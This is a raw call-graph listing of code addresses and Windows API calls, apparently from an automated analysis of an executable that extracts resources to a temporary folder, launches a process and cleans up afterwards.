5120->5123 5124 40ce50 2 API calls 5121->5124 5645 408bc0 5122->5645 5127 40cf00 2 API calls 5123->5127 5125 4016fb 5124->5125 5128 402c3b 7 API calls 5125->5128 5130 401478 5127->5130 5131 40170b 5128->5131 5133 40ce50 2 API calls 5130->5133 5134 40188a 5131->5134 5137 4073f1 3 API calls 5131->5137 5145 401482 5133->5145 5457 40cf00 5134->5457 5140 401725 5137->5140 5139 40189b 5142 40cf00 2 API calls 5139->5142 5143 40a1f0 2 API calls 5140->5143 5146 4018a5 5142->5146 5157 401744 5143->5157 5706 40b6a0 5145->5706 5149 40cf00 2 API calls 5146->5149 5152 4018b0 5149->5152 5156 40ce50 2 API calls 5152->5156 5154 40a1f0 2 API calls 5155 401639 5154->5155 5163 401654 5155->5163 5164 40167f 5155->5164 5159 4018ba 5156->5159 5157->5134 5161 40177b 5157->5161 5461 404100 5159->5461 5739 40a395 5161->5739 5169 406fb0 20 API calls 5163->5169 5170 402c3b 7 API calls 5164->5170 5165 4018cc 5171 40ce50 2 API calls 5165->5171 5167 401790 5743 407023 5167->5743 5168 40154d RemoveDirectoryA 5168->5081 5173 40166a RemoveDirectoryA 5169->5173 5174 40168f 5170->5174 5175 4018d6 5171->5175 5173->5081 5712 402d4e 5174->5712 5177 40cf00 2 API calls 5175->5177 5176 4017ab 5178 40ce50 2 API calls 5176->5178 5180 4018fd 5177->5180 5192 4017b5 5178->5192 5183 40cf00 2 API calls 5180->5183 5181 40153d 5181->5168 5182 401581 5181->5182 5185 4015c9 5181->5185 5676 408de7 5181->5676 5679 4082e4 5182->5679 5184 401907 GetTempFileNameA 5183->5184 5467 40a48b 5184->5467 5188 4082e4 4 API calls 5185->5188 5191 4015db 5188->5191 5189 401593 5194 40ce50 2 API calls 5189->5194 5196 40ce50 2 API calls 5191->5196 5193 401838 5192->5193 5197 40cf00 2 API calls 5192->5197 5199 407452 4 API calls 5193->5199 5198 40159d 5194->5198 5195 40cf00 2 API calls 5200 40194d 5195->5200 5201 4015e5 5196->5201 5202 4017d5 5197->5202 5685 408783 5198->5685 5204 401853 5199->5204 5205 40ce50 2 API calls 5200->5205 5206 408783 19 API calls 5201->5206 5207 40ce50 2 API calls 5202->5207 5209 40a3e7 2 API calls 5204->5209 5210 401957 5205->5210 5208 4015a7 5206->5208 5211 4017df 5207->5211 5208->5145 5212 401861 5209->5212 5470 40a8a0 5210->5470 5214 40a3d5 SetCurrentDirectoryA 5211->5214 5215 40a3d5 SetCurrentDirectoryA 5212->5215 5224 4017ea 5214->5224 5217 40186f RemoveDirectoryA 5215->5217 5216 401967 5218 40196b 5216->5218 5219 40198d 5216->5219 5217->5081 5481 40aa20 5218->5481 5221 40a48b 2 API calls 5219->5221 5222 401998 5221->5222 5226 402ffb 9 API calls 5222->5226 5223 401804 5228 40a8a0 8 API calls 5223->5228 5224->5223 5227 40251c 84 API calls 5224->5227 5225 401981 5488 40a680 5225->5488 5230 40199d 5226->5230 5227->5223 5231 401814 5228->5231 5232 406fb0 20 API calls 5230->5232 5231->5193 5234 40aa20 6 API calls 5231->5234 5233 4019b3 RemoveDirectoryA 5232->5233 5233->5081 5235 40182e 5234->5235 5237 40a680 5 API calls 5235->5237 5236 40198b 5238 4019e2 5236->5238 5495 40251c 5236->5495 5237->5193 5240 404100 2 API calls 5238->5240 5241 4019f4 5240->5241 5242 40ce50 2 API calls 5241->5242 5243 4019fe 5242->5243 5571 407452 5243->5571 5245 401a1c GetShortPathNameA 5246 407452 4 API calls 5245->5246 5247 401a49 5246->5247 5576 4074ad 5247->5576 5250 407452 4 API calls 5251 401a84 5250->5251 5580 40a541 5251->5580 5254 4074ad SetEnvironmentVariableA 5255 401aac 5254->5255 5256 407452 4 API calls 5255->5256 5257 401acd 5256->5257 5583 40a3e7 5257->5583 5259 401adb 5260 4074ad SetEnvironmentVariableA 5259->5260 5261 401af5 5260->5261 5588 404200 5261->5588 5264 4074ad SetEnvironmentVariableA 5265 401b2e 5264->5265 5266 4074ad SetEnvironmentVariableA 5265->5266 5267 401b44 5266->5267 5591 404390 5267->5591 5269 401b5f 5270 4074ad SetEnvironmentVariableA 5269->5270 5271 401b79 PathQuoteSpacesA 5270->5271 5599 402c07 5271->5599 5274 401b98 5276 401c15 5274->5276 5277 401bac 5274->5277 5275 40866f 2 API calls 5275->5274 5279 404100 2 API calls 5276->5279 5278 404100 2 API calls 5277->5278 5281 401bbe 5278->5281 5280 401c27 5279->5280 5282 40ce50 2 API calls 5280->5282 5283 40ce50 2 API calls 5281->5283 5284 401c31 GetSystemDirectoryA PathAddBackslashA 5282->5284 5285 401bc8 GetWindowsDirectoryA PathAddBackslashA 5283->5285 5286 401c4c 5284->5286 5287 40cf00 2 API calls 5285->5287 5288 40cf00 2 API calls 5286->5288 5289 401bf4 5287->5289 5290 401c63 5288->5290 5291 40cf00 2 API calls 5289->5291 5292 40cf00 2 API calls 5290->5292 5293 401bfe 5291->5293 5294 401c6d 5292->5294 5295 40ce50 2 API calls 5293->5295 5296 40cf00 2 API calls 5294->5296 5297 401c08 PathAddBackslashA 5295->5297 5298 401c78 5296->5298 5297->5286 5299 40cf00 2 API calls 5298->5299 5300 401c95 5299->5300 5301 40cf00 2 API calls 5300->5301 5302 401c9f 5301->5302 5603 40230c 5302->5603 5307 40a48b 2 API calls 5308 401cdd 5307->5308 5309 407452 4 API calls 5308->5309 5310 401cf8 5309->5310 5311 40a3e7 2 API calls 5310->5311 5312 401d06 5311->5312 5628 40a3d5 5312->5628 5315->5017 5764 40c45a HeapAlloc 5316->5764 5319 40b0e2 32 API calls 5320 40aca0 5319->5320 5321 401058 5320->5321 5322 40acaf InitializeCriticalSection 5320->5322 5323 40a700 5321->5323 5322->5321 5766 40c40a HeapAlloc HeapAlloc 5323->5766 5325 40105d 5326 40a389 TlsAlloc 5325->5326 5326->5023 5327->5025 5329 40c45a HeapAlloc 5328->5329 5330 40106c 5329->5330 5331 40a119 5330->5331 5767 40c40a HeapAlloc HeapAlloc 5331->5767 5333 401071 5334 409881 LoadLibraryA 5333->5334 5335 4098a3 GetProcAddress 5334->5335 5336 4098b4 GetVersionExA 5334->5336 5335->5336 5337 4098d3 5336->5337 5338 401076 5337->5338 5339 4098fa 5337->5339 5342 4088b0 5338->5342 5768 4097c8 LoadLibraryA 5339->5768 5778 40c40a HeapAlloc HeapAlloc 5342->5778 5344 4088bf 5345 40c45a HeapAlloc 5344->5345 5346 4088cf 5345->5346 5347 40c45a HeapAlloc 5346->5347 5348 4088dd LoadIconA LoadCursorA 5347->5348 5348->5033 5779 40c40a HeapAlloc HeapAlloc 5349->5779 5351 407aec 5352 40c45a HeapAlloc 5351->5352 5353 407b02 memset InitCommonControlsEx 5352->5353 5353->5035 5355 40c45a HeapAlloc 5354->5355 5356 40730c 5355->5356 5780 40c40a HeapAlloc HeapAlloc 5356->5780 5358 40731f InitializeCriticalSection 5358->5037 5359->5039 5361 4077b1 5360->5361 5362 40109a 5360->5362 5781 407a20 5361->5781 5371 4076f4 HeapAlloc 5362->5371 5367 4077eb 5369 4077f1 HeapFree 5367->5369 5370 4077fd HeapFree 5367->5370 5368 4077d9 HeapFree 5368->5367 5368->5368 5369->5370 5370->5362 5372 407713 HeapAlloc 5371->5372 5373 407726 5371->5373 5372->5373 5825 40c495 5373->5825 5376 40cabd 5848 40cbe5 5376->5848 5379 40cb29 5379->5045 5380 40caec memset 5380->5379 5854 40b1da 5381->5854 5384 4010f2 5384->5048 5385 40b10e RtlAllocateHeap 5387 40b135 5385->5387 5388 40b19f HeapFree 5385->5388 5389 40b165 5387->5389 5388->5384 5390 40c495 9 API calls 5389->5390 5391 40b181 HeapAlloc 5390->5391 5391->5384 5872 40cfe0 5392->5872 5394 401128 5394->5054 5396 40869d 5395->5396 5397 4011bd 5395->5397 5396->5397 5398 4086ae GetVersionExA 5396->5398 5397->5074 5397->5075 5399 4086c7 5398->5399 5399->5397 5401 407530 5400->5401 5402 407538 5401->5402 5403 40755a SetUnhandledExceptionFilter 5401->5403 5404 407541 SetUnhandledExceptionFilter 5402->5404 5405 40754b SetUnhandledExceptionFilter 5402->5405 5403->5078 5404->5405 5405->5078 5407 40744a 5406->5407 5879 407330 5407->5879 5884 404060 5410->5884 5413 402c6d LoadResource SizeofResource 5415 402c91 5413->5415 5418 402cdb 5415->5418 5887 40a290 5415->5887 5416 40cf60 HeapFree 5417 4012f4 5416->5417 5417->5087 5417->5088 5418->5416 5420 40a290 HeapAlloc 5419->5420 5421 4023fe 5420->5421 5896 40a563 5421->5896 5423 402412 5424 40ce50 2 API calls 5423->5424 5425 40241c GetTempFileNameA 5424->5425 5903 40a2b0 5425->5903 5428 40ce50 2 API calls 5429 402453 5428->5429 5909 40a300 HeapFree 5429->5909 5431 40245b 5432 40a48b 2 API calls 5431->5432 5433 402466 5432->5433 5910 40a5c4 5433->5910 5436 40a395 2 API calls 5437 402482 5436->5437 5438 40ce50 2 API calls 5437->5438 5439 40248e 5438->5439 5440 40cf00 2 API calls 5439->5440 5443 4024bd 5439->5443 5441 4024b1 5440->5441 5442 40ce50 2 API calls 5441->5442 5442->5443 5444 40cf60 HeapFree 5443->5444 5445 40130d 5444->5445 5445->5095 5447 40a1fa 5446->5447 5448 40a20d 5446->5448 5449 40a2b0 2 API calls 5447->5449 5451 40d090 HeapReAlloc 5448->5451 5450 40a209 5449->5450 5450->5102 5452 40a21f 5451->5452 5452->5102 5454 40ce83 HeapReAlloc 5453->5454 5455 40ce67 RtlAllocateHeap 5453->5455 5456 40cea4 5454->5456 5455->5456 5456->5105 5458 40cf0f strlen 5457->5458 5460 40cf2e 5457->5460 5459 40d090 HeapReAlloc 5458->5459 5459->5460 5460->5139 5462 40410a 5461->5462 5463 40d090 HeapReAlloc 5462->5463 5464 404117 5463->5464 5465 404132 5464->5465 5466 40411d memset 5464->5466 5465->5165 5466->5165 5918 40a45d 5467->5918 5923 40c325 5470->5923 5473 40a8f6 5475 40a949 5473->5475 5476 40a8fc 5473->5476 5474 40a8dd CreateFileA 5474->5473 5474->5475 5478 40a95d 5475->5478 5932 40c3cf 5475->5932 5477 40a905 HeapAlloc 5476->5477 5480 40a919 5476->5480 5477->5480 5478->5216 5480->5216 5482 40aa30 5481->5482 5483 40aa74 5481->5483 5482->5483 5484 40aa62 WriteFile 5482->5484 5485 40aa54 5482->5485 5483->5225 5484->5483 5944 40aa80 5485->5944 5487 40aa5c 5487->5225 5490 40a68a 5488->5490 5489 40a6e1 5489->5236 5490->5489 5491 40a6cb FindCloseChangeNotification 5490->5491 5492 40a640 WriteFile 5490->5492 5493 40c3cf 2 API calls 5491->5493 5494 40a6b9 HeapFree 5492->5494 5493->5489 5494->5491 5496 402523 5495->5496 5496->5496 5497 404060 2 API calls 5496->5497 5498 40253c 5497->5498 5499 40a3d5 SetCurrentDirectoryA 5498->5499 5500 40254f 5499->5500 5501 40a395 2 API calls 5500->5501 5502 402571 5501->5502 5958 404420 5502->5958 5504 40257f 5505 40ce50 2 API calls 5504->5505 5507 402589 5505->5507 5506 4044c0 strncmp memmove strncpy HeapReAlloc 5506->5507 5507->5506 5509 40ce50 RtlAllocateHeap HeapReAlloc 5507->5509 5520 404068 strlen HeapAlloc HeapReAlloc HeapFree 5507->5520 5560 402851 5507->5560 5563 40cf00 strlen HeapReAlloc 5507->5563 5568 40a5c4 3 API calls 5507->5568 5569 40b1b8 12 API calls 5507->5569 5962 404720 5507->5962 5966 40cc35 5507->5966 5971 40780d 5507->5971 5508 402ac0 5993 404a50 5508->5993 5509->5507 5511 40cf00 strlen HeapReAlloc 5511->5560 5515 404200 HeapReAlloc 5518 402afa 5515->5518 5517 40a8a0 8 API calls 5517->5560 5519 402baf 5518->5519 5521 40cf00 2 API calls 5518->5521 5524 40cf60 HeapFree 5519->5524 5520->5507 5523 402b34 5521->5523 5522 404800 HeapReAlloc 5522->5560 5526 40cf00 2 API calls 5523->5526 5527 402bc0 5524->5527 5525 40a680 5 API calls 5551 4028cf 5525->5551 5529 402b3e 5526->5529 5530 40cf60 HeapFree 5527->5530 5528 404390 HeapReAlloc 5528->5560 5532 40cf00 2 API calls 5529->5532 5533 402bc9 5530->5533 5536 402b47 5532->5536 5534 40cf60 HeapFree 5533->5534 5537 402bd2 5534->5537 5535 4074ad SetEnvironmentVariableA 5535->5560 5538 40cf00 2 API calls 5536->5538 5539 40cf60 HeapFree 5537->5539 5541 402b51 5538->5541 5543 402bdb 5539->5543 5540 40aa20 6 API calls 5540->5560 5542 40cf00 2 API calls 5541->5542 5544 402b5c 5542->5544 5545 40cf60 HeapFree 5543->5545 5547 406fb0 20 API calls 5544->5547 5548 402be4 5545->5548 5546 40a680 5 API calls 5546->5560 5549 402b77 5547->5549 5550 40cf60 HeapFree 5548->5550 5549->5519 5555 402ffb 9 API calls 5549->5555 5553 402bed 5550->5553 5551->5525 5554 40cf00 strlen HeapReAlloc 5551->5554 5559 40ce50 2 API calls 5551->5559 5551->5560 5976 40a970 5551->5976 5986 404800 5551->5986 5552 40780d 5 API calls 5552->5560 5556 40cf60 HeapFree 5553->5556 5554->5551 5557 402b8f 5555->5557 5558 402bf6 5556->5558 5561 40a48b 2 API calls 5557->5561 5562 40cf60 HeapFree 5558->5562 5559->5551 5560->5508 5560->5511 5560->5517 5560->5522 5560->5528 5560->5535 5560->5540 5560->5546 5560->5551 5560->5552 5564 40ce50 RtlAllocateHeap HeapReAlloc 5560->5564 5990 40b9c0 5560->5990 5565 402b9a RemoveDirectoryA 5561->5565 5566 402bff 5562->5566 5563->5507 5564->5560 5565->5519 5566->5238 5568->5507 5569->5507 5572 40d090 HeapReAlloc 5571->5572 5573 407464 GetModuleFileNameA strcmp 5572->5573 5574 407487 memmove 5573->5574 5575 40749b 5573->5575 5574->5575 5575->5245 5577 4074b6 SetEnvironmentVariableA 5576->5577 5578 401a63 5576->5578 5577->5578 5578->5250 6026 40a499 5580->6026 5582 401a92 5582->5254 5584 40a3f8 5583->5584 5585 40d090 HeapReAlloc 5584->5585 5586 40a435 5585->5586 5587 40a447 memmove 5586->5587 5587->5259 6031 404140 5588->6031 5590 401b14 5590->5264 5592 4043c2 5591->5592 5593 4043ab 5591->5593 5595 40d090 HeapReAlloc 5592->5595 5593->5592 5594 4043b2 5593->5594 6035 4042d0 5594->6035 5598 4043cf 5595->5598 5597 4043bd 5597->5269 5598->5269 5600 402c0d 5599->5600 5600->5600 5601 402c1a GetNativeSystemInfo 5600->5601 5602 401b8f 5601->5602 5602->5274 5602->5275 5604 402313 5603->5604 5604->5604 5605 404060 2 API calls 5604->5605 5606 40232c 5605->5606 5607 404060 2 API calls 5606->5607 5608 402339 5607->5608 5609 404060 2 API calls 5608->5609 5610 402346 ShellExecuteExA 5609->5610 5611 402395 5610->5611 5614 4023c0 5611->5614 6038 408762 5611->6038 5613 40239f GetExitCodeProcess 5613->5611 5615 40cf60 HeapFree 5614->5615 5616 4023d4 5615->5616 5617 40cf60 HeapFree 5616->5617 5618 4023dd 5617->5618 5619 40cf60 HeapFree 5618->5619 5620 401cb7 5619->5620 5621 402ffb 5620->5621 5622 401cc7 PathUnquoteSpacesA 5621->5622 5623 40300f 5621->5623 5622->5307 5624 40305f 5623->5624 5625 40b9c0 6 API calls 5623->5625 5626 40a48b 2 API calls 5623->5626 5624->5622 5627 4030a8 RemoveDirectoryA 5624->5627 5625->5623 5626->5623 5627->5624 5629 401d14 RemoveDirectoryA 5628->5629 5630 40a3dc SetCurrentDirectoryA 5628->5630 5629->5081 5630->5629 5631->5085 6041 4071fd 5632->6041 5637 4071fd 16 API calls 5638 406fd9 5637->5638 5638->5093 5640 407404 5639->5640 5641 407330 GetCommandLineA 5640->5641 5642 407419 5641->5642 5643 40d090 HeapReAlloc 5642->5643 5644 407427 strncpy 5643->5644 5644->5108 6065 408908 5645->6065 5648 407da3 6107 407cab 5648->6107 5651 407f7c 5652 407f8d 5651->5652 5653 407f9d memset 5652->5653 5654 40800e CreateWindowExA 5652->5654 5653->5654 5656 40805e 5654->5656 5660 4014fc 5654->5660 5657 40c325 3 API calls 5656->5657 5658 40806c SetWindowLongA 5657->5658 5659 4084cd 4 API calls 5658->5659 5659->5660 5661 408289 5660->5661 6121 4081bc 5661->6121 5664 408be3 5666 408bfd 5664->5666 5665 401533 5672 4082a9 5665->5672 5666->5665 5667 408c69 HeapAlloc 5666->5667 5668 408c8c HeapReAlloc 5666->5668 5669 408c7b 5666->5669 5667->5669 5668->5669 5670 408ce0 DestroyAcceleratorTable 5669->5670 5671 408ce7 CreateAcceleratorTableA 5669->5671 5670->5671 5671->5665 5675 4082b0 5672->5675 5673 4082db SetFocus 5674 4082d4 5673->5674 5674->5181 5675->5673 5675->5674 6131 408cfe 5676->6131 5680 4082f4 5679->5680 5681 408304 5680->5681 5682 40830d GetWindowTextLengthA 5680->5682 5681->5189 5683 40d090 HeapReAlloc 5682->5683 5684 408323 GetWindowTextA strlen 5683->5684 5684->5681 5686 4087a2 5685->5686 5687 408792 5685->5687 5686->5687 5688 4087bb GetWindow 5686->5688 5687->5208 5689 4087d6 RemovePropA RemovePropA 5688->5689 5690 4087c9 5688->5690 5691 4087f4 RevokeDragDrop 5689->5691 5692 4087fc 5689->5692 5690->5689 5693 4087cf SetActiveWindow 5690->5693 5691->5692 5694 408803 SendMessageA 5692->5694 5695 408815 DestroyWindow sprintf UnregisterClassA 5692->5695 5693->5689 5696 408847 5694->5696 5695->5696 5697 408866 5696->5697 5698 40884e HeapFree DestroyAcceleratorTable 5696->5698 5699 408874 5697->5699 5700 40886d DeleteObject 5697->5700 5698->5697 6205 40b046 5699->6205 5700->5699 5705 40c3cf 2 API calls 5705->5687 5707 40b6ad 5706->5707 6221 40c270 5707->6221 5709 40b6d0 5710 40d090 HeapReAlloc 5709->5710 5711 40161a 5710->5711 5711->5154 5713 402d56 5712->5713 5713->5713 5714 404060 2 API calls 5713->5714 5715 402d6f 5714->5715 5716 40cabd 4 API calls 5715->5716 5717 402d8d 5716->5717 5718 40cabd 4 API calls 5717->5718 5719 402dab 5718->5719 5720 40cabd 4 API calls 5719->5720 5721 402dc9 5720->5721 6224 402000 5721->6224 5724 402000 6 API calls 5725 402ded 5724->5725 5726 402f61 5725->5726 5732 40a290 HeapAlloc 5725->5732 5736 402f2c RemoveDirectoryA 5725->5736 6238 40a350 5725->6238 5727 40cf60 HeapFree 5726->5727 5728 402fd5 5727->5728 5729 40cbe5 2 API calls 5728->5729 5730 402fdf 5729->5730 5731 40cbe5 2 API calls 5730->5731 5733 402fe8 5731->5733 5732->5725 5734 40cbe5 2 API calls 5733->5734 5735 402ff1 5734->5735 5735->5118 5738 406fb0 20 API calls 5736->5738 5738->5725 5740 40d090 HeapReAlloc 5739->5740 5741 40a3a7 GetCurrentDirectoryA 5740->5741 5742 40a3b7 5741->5742 5742->5167 5744 407038 CoInitialize 5743->5744 5745 407049 memset LoadLibraryA 5743->5745 5744->5745 5746 407161 5745->5746 5747 407076 GetProcAddress GetProcAddress 5745->5747 5750 40d090 HeapReAlloc 5746->5750 5748 4070a1 strncpy strlen 5747->5748 5749 40709a 5747->5749 5751 4070cc 5748->5751 5749->5748 5753 40716a 5750->5753 5752 4072a6 3 API calls 5751->5752 5754 4070e5 5752->5754 5753->5176 5755 4071fd 16 API calls 5754->5755 5756 407106 5755->5756 5757 4071fd 16 API calls 5756->5757 5758 407116 5757->5758 5759 407152 FreeLibrary 5758->5759 5760 40d090 HeapReAlloc 5758->5760 5759->5746 5759->5753 5761 407124 CoTaskMemFree strlen 5760->5761 5761->5759 5763 407149 5761->5763 5763->5759 5765 40ac87 5764->5765 5765->5319 5766->5325 5767->5333 5769 4097f5 GetProcAddress 5768->5769 5770 40983d LoadLibraryA 5768->5770 5773 409804 memset 5769->5773 5774 409836 FreeLibrary 5769->5774 5771 409879 5770->5771 5772 40984a GetProcAddress 5770->5772 5771->5338 5775 409872 FreeLibrary 5772->5775 5776 409856 5772->5776 5777 409822 5773->5777 5774->5770 5775->5771 5776->5775 5777->5774 5778->5344 5779->5351 5780->5358 5782 407a31 5781->5782 5783 407a50 5781->5783 5784 4077b8 5782->5784 5801 40d72a 5782->5801 5806 40c72a 5782->5806 5783->5784 5785 40c72a 3 API calls 5783->5785 5788 40c851 5784->5788 5785->5783 5789 40c861 EnterCriticalSection 5788->5789 5790 40c8c3 5788->5790 5792 40c8b9 LeaveCriticalSection 5789->5792 5793 40c87c 5789->5793 5816 40c7e3 5790->5816 5794 4077c0 5792->5794 5796 40c851 4 API calls 5793->5796 5794->5367 5794->5368 5799 40c885 HeapFree 5796->5799 5797 40c8d8 HeapFree 5797->5794 5798 40c8ce DeleteCriticalSection 5798->5797 5799->5792 5802 40d810 5801->5802 5804 40d740 5801->5804 5802->5782 5804->5802 5805 40d72a HeapFree 5804->5805 5813 40cf60 5804->5813 5805->5804 5807 40c735 EnterCriticalSection 5806->5807 5810 40c73f 5806->5810 5807->5810 5808 40c7d5 LeaveCriticalSection 5809 40c7df 5808->5809 5809->5782 5811 40c793 5810->5811 5812 40c77c HeapFree 5810->5812 5811->5808 5811->5809 5812->5811 5814 40cf6b HeapFree 5813->5814 5815 40cf7e 5813->5815 5814->5815 5815->5804 5817 40c7f2 EnterCriticalSection 5816->5817 5818 40c7fc 5816->5818 5817->5818 5819 40c809 HeapFree 5818->5819 5820 40c81b 5818->5820 5819->5819 5819->5820 5821 40c821 HeapFree 5820->5821 5822 40c833 5820->5822 5821->5821 5821->5822 5823 40c840 LeaveCriticalSection 5822->5823 5824 40c84a 5822->5824 5823->5824 5824->5797 5824->5798 5826 40c4b4 5825->5826 5827 40c4c5 5826->5827 5828 40c57b HeapAlloc 5826->5828 5841 40c92e LoadLibraryA 5827->5841 5829 40c5bf 5828->5829 5830 40c592 5828->5830 5834 4010b5 5829->5834 5830->5829 5833 40c5b0 InitializeCriticalSection 5830->5833 5832 40c4d4 EnterCriticalSection 5836 40c4e6 5832->5836 5833->5829 5834->5376 5835 40c508 HeapAlloc 5837 40c51d 5835->5837 5840 40c533 LeaveCriticalSection 5835->5840 5836->5835 5836->5840 5838 40c495 4 API calls 5837->5838 5838->5840 5840->5834 5842 40c94b GetProcAddress 5841->5842 5845 40c976 5841->5845 5843 40c96b FreeLibrary 5842->5843 5844 40c95b 5842->5844 5843->5845 5846 40c999 5843->5846 5844->5843 5845->5846 5847 40c98d Sleep 5845->5847 5846->5832 5847->5845 5849 40cacd RtlAllocateHeap 5848->5849 5853 40cbee 5848->5853 5849->5379 5849->5380 5850 40cc17 HeapFree 5850->5849 5851 40cc15 5851->5850 5852 40d72a HeapFree 5852->5853 5853->5850 5853->5851 5853->5852 5855 40b1e6 5854->5855 5856 40b0f2 HeapAlloc 5854->5856 5865 40b516 5855->5865 5856->5384 5856->5385 5858 40b1ed 5859 40c851 9 API calls 5858->5859 5860 40b1f5 HeapFree HeapFree 5859->5860 5861 40b21a 5860->5861 5862 40b22e HeapFree 5860->5862 5863 40b21b HeapFree 5861->5863 5862->5856 5863->5863 5864 40b22d 5863->5864 5864->5862 5868 40b52a 5865->5868 5866 40b573 memset 5869 40b58c 5866->5869 5867 40b535 HeapFree 5867->5868 5868->5866 5868->5867 5870 40d72a HeapFree 5868->5870 5871 40c72a 3 API calls 5868->5871 5869->5858 5870->5868 5871->5868 5873 40cff1 strlen 5872->5873 5874 40d05a 5872->5874 5877 40d024 HeapReAlloc 5873->5877 5878 40d008 HeapAlloc 5873->5878 5875 40d062 HeapFree 5874->5875 5876 40d045 5874->5876 5875->5876 5876->5394 5877->5876 5878->5876 5883 40c453 5879->5883 5881 407342 GetCommandLineA 5882 4011f0 GetModuleHandleA 5881->5882 5882->5082 5882->5108 5883->5881 5890 40cf90 5884->5890 5888 40a298 HeapAlloc 5887->5888 5889 40a2aa 5887->5889 5888->5418 5889->5418 5891 402c50 FindResourceA 5890->5891 5892 40cf9a strlen HeapAlloc 5890->5892 5891->5413 5891->5415 5894 40d170 5892->5894 5895 40d17d 5894->5895 5895->5891 5915 40d090 5896->5915 5899 40a5b1 5899->5423 5900 40a593 GetProcAddress 5901 40a5a3 GetLongPathNameA 5900->5901 5902 40a5aa FreeLibrary 5900->5902 5901->5902 5902->5899 5904 40a2bd 5903->5904 5905 40d090 HeapReAlloc 5904->5905 5906 40a2d8 5905->5906 5907 402447 5906->5907 5908 40a2de memcpy 5906->5908 5907->5428 5908->5907 5909->5431 5911 40a5d3 strncpy strlen 5910->5911 5912 402471 5910->5912 5914 40a603 CreateDirectoryA 5911->5914 5912->5436 5914->5912 5916 40a576 GetTempPathA LoadLibraryA 5915->5916 5917 40d0af HeapReAlloc 5915->5917 5916->5899 5916->5900 5917->5916 5919 40a464 5918->5919 5920 40192c PathRenameExtensionA 5918->5920 5921 40a47a DeleteFileA 5919->5921 5922 40a46b SetFileAttributesA 5919->5922 5920->5195 5921->5920 5922->5921 5924 40c346 5923->5924 5925 40c32f 5923->5925 5927 40c371 5924->5927 5928 40c351 HeapReAlloc 5924->5928 5939 40ca50 HeapAlloc 5925->5939 5930 40c388 HeapAlloc 5927->5930 5931 40a8b5 CreateFileA 5927->5931 5928->5927 5930->5931 5931->5473 5931->5474 5933 40c3fb 5932->5933 5934 40c3db 5932->5934 5941 40ca7d 5933->5941 5934->5933 5936 40c3e0 5934->5936 5937 40c405 5936->5937 5938 40c3eb memset 5936->5938 5937->5478 5938->5937 5940 40c342 5939->5940 5940->5931 5942 40ca8e HeapFree 5941->5942 5942->5937 5945 40aab5 5944->5945 5946 40aa95 SetFilePointer 5944->5946 5947 40aac0 5945->5947 5948 40ab2a 5945->5948 5946->5945 5950 40aaef 5947->5950 5954 40aad5 memcpy 5947->5954 5955 40a640 5948->5955 5950->5487 5952 40ab57 memcpy 5952->5487 5953 40ab37 WriteFile 5953->5487 5954->5487 5956 40a651 WriteFile 5955->5956 5957 40a675 5955->5957 5956->5957 5957->5952 5957->5953 5959 40442d 5958->5959 5960 40d090 HeapReAlloc 5959->5960 5961 404494 5960->5961 5961->5504 5963 404733 5962->5963 5965 404767 5962->5965 5964 404755 strstr 5963->5964 5963->5965 5964->5965 5965->5507 5968 40cc4f 5966->5968 5970 40cc98 5966->5970 5967 40cc77 RtlReAllocateHeap 5967->5970 5968->5967 5969 40d72a HeapFree 5968->5969 5969->5968 5970->5507 5996 40c5cb 5971->5996 5974 407824 5974->5507 5975 407828 memset 5975->5974 5977 40c325 3 API calls 5976->5977 5978 40a986 CreateFileA 5977->5978 5979 40a9f9 5978->5979 5980 40a9aa 5978->5980 5982 40aa0b 5979->5982 5985 40c3cf 2 API calls 5979->5985 5980->5979 5981 40a9ae 5980->5981 5983 40a9b7 HeapAlloc 5981->5983 5984 40a9cb 5981->5984 5982->5551 5983->5984 5984->5551 5985->5982 5987 40480d 5986->5987 5988 40d090 HeapReAlloc 5987->5988 5989 404835 5988->5989 5989->5551 6004 40b7a0 5990->6004 6014 404870 5993->6014 5995 402aec 5995->5515 5997 40c5e9 5996->5997 5998 40c5df EnterCriticalSection 5996->5998 5999 40c680 HeapAlloc 5997->5999 6003 40c5f0 5997->6003 5998->5997 6000 40c6a9 HeapAlloc 5999->6000 5999->6003 6000->6003 6001 40781c 6001->5974 6001->5975 6002 40c70b LeaveCriticalSection 6002->6001 6003->6001 6003->6002 6005 40b9ad 6004->6005 6006 40b7be CreateFileA 6004->6006 6005->5560 6006->6005 6007 40b7e5 RtlAllocateHeap 6006->6007 6008 40b802 6007->6008 6009 40b9a5 FindCloseChangeNotification 6007->6009 6010 40b812 SetFilePointer 6008->6010 6012 40b821 6008->6012 6009->6005 6010->6012 6011 40b86d ReadFile 6011->6012 6012->6011 6012->6012 6013 40b995 RtlFreeHeap 6012->6013 6013->6009 6015 40487f 6014->6015 6016 40d090 HeapReAlloc 6015->6016 6018 4048c0 6016->6018 6017 4049f9 6017->5995 6018->6017 6018->6018 6019 40492a HeapAlloc 6018->6019 6020 404948 6018->6020 6019->6020 6021 404974 strncpy 6020->6021 6024 404996 6020->6024 6021->6024 6022 4049de 6022->6017 6023 4049e5 HeapFree 6022->6023 6023->6017 6024->6022 6025 4049ba strncpy 6024->6025 6025->6022 6027 40a4aa 6026->6027 6028 40d090 HeapReAlloc 6027->6028 6029 40a519 6028->6029 6030 40a52b memmove 6029->6030 6030->5582 6032 404151 6031->6032 6033 40d090 HeapReAlloc 6032->6033 6034 4041c4 6033->6034 6034->5590 6036 40d090 HeapReAlloc 6035->6036 6037 4042e0 6036->6037 6037->5597 6039 40876b timeBeginPeriod 6038->6039 6040 40877d Sleep 6038->6040 6039->6040 6042 407208 EnumWindows 6041->6042 6048 40724c 6041->6048 6043 407221 GetCurrentThreadId 6042->6043 6047 406fb8 6042->6047 6055 40717b GetWindowThreadProcessId GetCurrentThreadId 6042->6055 6045 40722e 6043->6045 6044 407257 GetCurrentThreadId 6044->6048 6045->6043 6046 407233 SetWindowPos 6045->6046 6045->6047 6046->6045 6052 4072a6 GetForegroundWindow 6047->6052 6048->6044 6048->6047 6049 40726b EnableWindow 6048->6049 6050 40727b SetWindowPos 6048->6050 6051 40ca7d HeapFree 6048->6051 6049->6048 6050->6048 6051->6048 6053 4072b7 GetWindowThreadProcessId GetCurrentProcessId 6052->6053 6054 406fc9 MessageBoxA 6052->6054 6053->6054 6054->5637 6056 4071f4 6055->6056 6057 407199 IsWindowVisible 6055->6057 6057->6056 6058 4071a4 6057->6058 6059 40ca50 HeapAlloc 6058->6059 6060 4071b0 GetCurrentThreadId GetWindowLongA 6059->6060 6061 4071d2 GetForegroundWindow 6060->6061 6062 4071ce 6060->6062 6061->6056 6063 4071dc IsWindowEnabled 6061->6063 6062->6061 6063->6056 6064 4071e7 EnableWindow 6063->6064 6064->6056 6066 40c325 3 API calls 